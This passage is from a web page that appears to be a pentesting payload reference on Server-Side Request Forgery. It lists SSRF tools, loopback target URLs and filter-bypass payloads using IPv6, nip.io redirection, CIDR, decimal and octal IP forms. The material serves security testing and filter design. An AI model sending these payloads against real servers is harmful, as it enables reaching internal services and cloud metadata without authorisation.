</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Serialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/YAML/" class="md-nav__link">
<span class="md-ellipsis">
YAML Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" checked>
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#payloads-with-localhost" class="md-nav__link">
<span class="md-ellipsis">
Payloads with localhost
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-filters" class="md-nav__link">
<span class="md-ellipsis">
Bypassing filters
</span>
</a>
<nav class="md-nav" aria-label="Bypassing filters">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#bypass-using-https" class="md-nav__link">
<span class="md-ellipsis">
Bypass using HTTPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with [::]
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-a-domain-redirection" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with a domain redirection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-localhost-with-cidr" class="md-nav__link">
<span class="md-ellipsis">
Bypass localhost with CIDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-a-decimal-ip-location" class="md-nav__link">
<span class="md-ellipsis">
Bypass using a decimal IP location
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-octal-ip" class="md-nav__link">
<span class="md-ellipsis">
Bypass using octal IP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-ipv6ipv4-address-embedding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using IPv6/IPv4 Address Embedding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-malformed-urls" class="md-nav__link">
<span class="md-ellipsis">
Bypass using malformed urls
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-rare-address" class="md-nav__link">
<span class="md-ellipsis">
Bypass using rare address
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-url-encoding" class="md-nav__link">
<span class="md-ellipsis">
Bypass using URL encoding
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-bash-variables" class="md-nav__link">
<span class="md-ellipsis">
Bypass using bash variables
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-tricks-combination" class="md-nav__link">
<span class="md-ellipsis">
Bypass using tricks combination
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-enclosed-alphanumerics" class="md-nav__link">
<span class="md-ellipsis">
Bypass using enclosed alphanumerics
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-using-unicode" class="md-nav__link">
<span class="md-ellipsis">
Bypass using unicode
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-filter_var-php-function" class="md-nav__link">
<span class="md-ellipsis">
Bypass filter_var() php function
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypass-against-a-weak-parser" class="md-nav__link">
<span class="md-ellipsis">
Bypass against a weak parser
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-a-redirect" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using a redirect
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-typeurl" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using type=url
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-dns-rebinding-toctou" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using DNS Rebinding (TOCTOU)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#bypassing-using-jar-protocol-java-only" class="md-nav__link">
<span class="md-ellipsis">
Bypassing using jar protocol (java only)
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploitation-via-url-scheme" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploitation via URL Scheme
</span>
</a>
<nav class="md-nav" aria-label="SSRF exploitation via URL Scheme">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#file" class="md-nav__link">
<span class="md-ellipsis">
File
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#http" class="md-nav__link">
<span class="md-ellipsis">
HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dict" class="md-nav__link">
<span class="md-ellipsis">
Dict
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sftp" class="md-nav__link">
<span class="md-ellipsis">
SFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tftp" class="md-nav__link">
<span class="md-ellipsis">
TFTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ldap" class="md-nav__link">
<span class="md-ellipsis">
LDAP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher" class="md-nav__link">
<span class="md-ellipsis">
Gopher
</span>
</a>
<nav class="md-nav" aria-label="Gopher">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#gopher-http" class="md-nav__link">
<span class="md-ellipsis">
Gopher HTTP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-back-connect-to-1337" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - Back connect to 1337
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#gopher-smtp-send-a-mail" class="md-nav__link">
<span class="md-ellipsis">
Gopher SMTP - send a mail
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#netdoc" class="md-nav__link">
<span class="md-ellipsis">
Netdoc
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-wsgi" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting WSGI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-redis" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting Redis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-exploiting-pdf-file" class="md-nav__link">
<span class="md-ellipsis">
SSRF exploiting PDF file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-ssrf" class="md-nav__link">
<span class="md-ellipsis">
Blind SSRF
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-to-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF to XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-from-xss" class="md-nav__link">
<span class="md-ellipsis">
SSRF from XSS
</span>
</a>
<nav class="md-nav" aria-label="SSRF from XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#using-an-iframe" class="md-nav__link">
<span class="md-ellipsis">
Using an iframe
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-an-attachment" class="md-nav__link">
<span class="md-ellipsis">
Using an attachment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-cloud-instances" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for Cloud Instances
</span>
</a>
<nav class="md-nav" aria-label="SSRF URL for Cloud Instances">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#ssrf-url-for-aws" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-ecs" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS ECS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ssrf-url-for-aws-elastic-beanstalk" class="md-nav__link">
<span class="md-ellipsis">
SSRF URL for AWS Elastic Beanstalk
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="server-side-request-forgery">Server-Side Request Forgery</h1>
<blockquote>
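<p>Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker causes a server to send requests to a destination the attacker chooses. Because the requests originate from the server, they can reach internal services that are not exposed to the attacker directly.</p>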
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#payloads-with-localhost">Payloads with localhost</a></li>
<li><a href="#bypassing-filters">Bypassing filters</a></li>
<li><a href="#bypass-using-https">Bypass using HTTPS</a></li>
<li><a href="#bypass-localhost-with">Bypass localhost with [::]</a></li>
<li><a href="#bypass-localhost-with-a-domain-redirection">Bypass localhost with a domain redirection</a></li>
<li><a href="#bypass-localhost-with-cidr">Bypass localhost with CIDR</a></li>
<li><a href="#bypass-using-a-decimal-ip-location">Bypass using a decimal IP location</a></li>
<li><a href="#bypass-using-octal-ip">Bypass using octal IP</a></li>
<li><a href="#bypass-using-ipv6ipv4-address-embedding">Bypass using IPv6/IPv4 Address Embedding</a></li>
<li><a href="#bypass-using-malformed-urls">Bypass using malformed urls</a></li>
<li><a href="#bypass-using-rare-address">Bypass using rare address</a></li>
<li><a href="#bypass-using-url-encoding">Bypass using URL encoding</a></li>
<li><a href="#bypass-using-bash-variables">Bypass using bash variables</a></li>
<li><a href="#bypass-using-tricks-combination">Bypass using tricks combination</a></li>
<li><a href="#bypass-using-enclosed-alphanumerics">Bypass using enclosed alphanumerics</a></li>
<li><a href="#bypass-filter_var-php-function">Bypass filter_var() php function</a></li>
<li><a href="#bypass-against-a-weak-parser">Bypass against a weak parser</a></li>
<li><a href="#bypassing-using-jar-protocol-java-only">Bypassing using jar protocol (java only)</a></li>
<li><a href="#ssrf-exploitation-via-url-scheme">SSRF exploitation via URL Scheme</a></li>
<li><a href="#file">file://</a></li>
<li><a href="#http">http://</a></li>
<li><a href="#dict">dict://</a></li>
<li><a href="#sftp">sftp://</a></li>
<li><a href="#tftp">tftp://</a></li>
<li><a href="#ldap">ldap://</a></li>
<li><a href="#gopher">gopher://</a></li>
<li><a href="#netdoc">netdoc://</a></li>
<li><a href="#ssrf-exploiting-wsgi">SSRF exploiting WSGI</a></li>
<li><a href="#ssrf-exploiting-redis">SSRF exploiting Redis</a></li>
<li><a href="#ssrf-exploiting-pdf-file">SSRF exploiting PDF file</a></li>
<li><a href="#blind-ssrf">Blind SSRF</a></li>
<li><a href="#ssrf-to-xss">SSRF to XSS</a></li>
<li><a href="#ssrf-from-xss">SSRF from XSS</a></li>
<li><a href="#ssrf-url-for-cloud-instances">SSRF URL for Cloud Instances</a></li>
<li><a href="#ssrf-url-for-aws">SSRF URL for AWS Bucket</a></li>
<li><a href="#ssrf-url-for-aws-ecs">SSRF URL for AWS ECS</a></li>
<li><a href="#ssrf-url-for-aws-elastic-beanstalk">SSRF URL for AWS Elastic Beanstalk</a></li>
<li><a href="#ssrf-url-for-aws-lambda">SSRF URL for AWS Lambda</a></li>
<li><a href="#ssrf-url-for-google-cloud">SSRF URL for Google Cloud</a></li>
<li><a href="#ssrf-url-for-digital-ocean">SSRF URL for Digital Ocean</a></li>
<li><a href="#ssrf-url-for-packetcloud">SSRF URL for Packetcloud</a></li>
<li><a href="#ssrf-url-for-azure">SSRF URL for Azure</a></li>
<li><a href="#ssrf-url-for-openstackrackspace">SSRF URL for OpenStack/RackSpace</a></li>
<li><a href="#ssrf-url-for-hp-helion">SSRF URL for HP Helion</a></li>
<li><a href="#ssrf-url-for-oracle-cloud">SSRF URL for Oracle Cloud</a></li>
<li><a href="#ssrf-url-for-kubernetes-etcd">SSRF URL for Kubernetes ETCD</a></li>
<li><a href="#ssrf-url-for-alibaba">SSRF URL for Alibaba</a></li>
<li><a href="#ssrf-url-for-docker">SSRF URL for Docker</a></li>
<li><a href="#ssrf-url-for-rancher">SSRF URL for Rancher</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/swisskyrepo/SSRFmap">swisskyrepo/SSRFmap</a> - Automatic SSRF fuzzer and exploitation tool</li>
<li><a href="https://github.com/tarunkant/Gopherus">tarunkant/Gopherus</a> - Generates gopher link for exploiting SSRF and gaining RCE in various servers</li>
<li><a href="https://github.com/In3tinct/See-SURF">In3tinct/See-SURF</a> - Python based scanner to find potential SSRF parameters</li>
<li><a href="https://github.com/teknogeek/ssrf-sheriff">teknogeek/SSRF Sheriff</a> - Simple SSRF-testing sheriff written in Go</li>
<li><a href="https://github.com/assetnote/surf">assetnote/surf</a> - Returns a list of viable SSRF candidates</li>
<li><a href="https://github.com/dwisiswant0/ipfuscator">dwisiswant0/ipfuscator</a> - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.</li>
</ul>
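<h2 id="payloads-with-localhost">Payloads with localhost</h2>
<p>Each URL below points the server at itself, which reaches services that listen only on the loopback interface and are otherwise unreachable from outside. The port numbers are examples.</p>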
<ul>
<li>Using <code>localhost</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="n">http</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
<li>Using <code>127.0.0.1</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
<li>Using <code>0.0.0.0</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">443</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">:</span><span class="n">22</span>
</code></pre></div></li>
</ul>
<h2 id="bypassing-filters">Bypassing filters</h2>
<h3 id="bypass-using-https">Bypass using HTTPS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="n">https</span><span class="p">://</span><span class="n">localhost</span><span class="p">/</span>
</code></pre></div>
<h3 id="bypass-localhost-with">Bypass localhost with [::]</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">25</span><span class="p">/</span> <span class="n">SMTP</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">22</span><span class="p">/</span> <span class="n">SSH</span>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="n">http</span><span class="p">://[::]:</span><span class="n">3128</span><span class="p">/</span> <span class="n">Squid</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">25</span><span class="p">/</span> <span class="n">SMTP</span>
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">22</span><span class="p">/</span> <span class="n">SSH</span>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="n">http</span><span class="p">://[</span><span class="n">0000</span><span class="p">::</span><span class="n">1</span><span class="p">]:</span><span class="n">3128</span><span class="p">/</span> <span class="n">Squid</span>
</code></pre></div>
<h3 id="bypass-localhost-with-a-domain-redirection">Bypass localhost with a domain redirection</h3>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Redirect to</th>
</tr>
</thead>
<tbody>
<tr>
<td>localtest.me</td>
<td><code>::1</code></td>
</tr>
<tr>
<td>localh.st</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.[BURP_COLLABORATOR]</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>spoofed.redacted.oastify.com</td>
<td><code>127.0.0.1</code></td>
</tr>
<tr>
<td>company.127.0.0.1.nip.io</td>
<td><code>127.0.0.1</code></td>
</tr>
</tbody>
</table>
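<p>The service nip.io is useful for this: it resolves any hostname that embeds an IP address to that address, so a filter that inspects only the hostname string never sees the IP. Filters need to check the address the name resolves to, not the name itself.</p>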
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">NIP</span><span class="p">.</span><span class="n">IO</span> <span class="n">maps</span> <span class="p">&lt;</span><span class="n">anything</span><span class="p">&gt;.&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">to</span> <span class="n">the</span> <span class="n">corresponding</span> <span class="p">&lt;</span><span class="n">IP</span> <span class="n">Address</span><span class="p">&gt;,</span> <span class="n">even</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span> <span class="n">maps</span> <span class="n">to</span> <span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-localhost-with-cidr">Bypass localhost with CIDR</h3>
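<p>IP addresses from 127.0.0.0/8: the whole block is reserved for loopback, so a filter that matches only <code>127.0.0.1</code> does not cover it.</p>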
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span><span class="p">.</span><span class="n">127</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">3</span>
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span>
</code></pre></div>
<h3 id="bypass-using-a-decimal-ip-location">Bypass using a decimal IP location</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">http</span><span class="p">://</span><span class="n">2130706433</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235521</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="n">http</span><span class="p">://</span><span class="n">3232235777</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="n">http</span><span class="p">://</span><span class="n">2852039166</span><span class="p">/</span> <span class="p">=</span> <span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
</code></pre></div>
<h3 id="bypass-using-octal-ip">Bypass using octal IP</h3>
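<p>Implementations differ in how they parse octal notation in IPv4 addresses, so the component that validates a URL and the client that fetches it can disagree about which host it names.</p>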
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a>http://0177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a>http://o177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a>http://0o177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-4" name="__codelineno-9-4" href="#__codelineno-9-4"></a>http://q177.0.0.1/<span class="w"> </span><span class="o">=</span><span class="w"> </span>http://127.0.0.1
<a id="__codelineno-9-5" name="__codelineno-9-5" href="#__codelineno-9-5"></a>...
</code></pre></div>
<p>Ref:</p>
<ul>
<li><a href="https://www.youtube.com/watch?v=_o1RPJAe4kU">DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards &amp; pwning IPv4 parsing</a></li>
<li><a href="https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15-Server_side_browsing_considered_harmful.pdf</a></li>
</ul>
<h3 id="bypass-using-ipv6ipv4-address-embedding">Bypass using IPv6/IPv4 Address Embedding</h3>
<p><a href="http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm">IPv6/IPv4 Address Embedding</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="n">http</span><span class="p">://[::</span><span class="n">ffff</span><span class="p">:</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">]</span>
</code></pre></div>
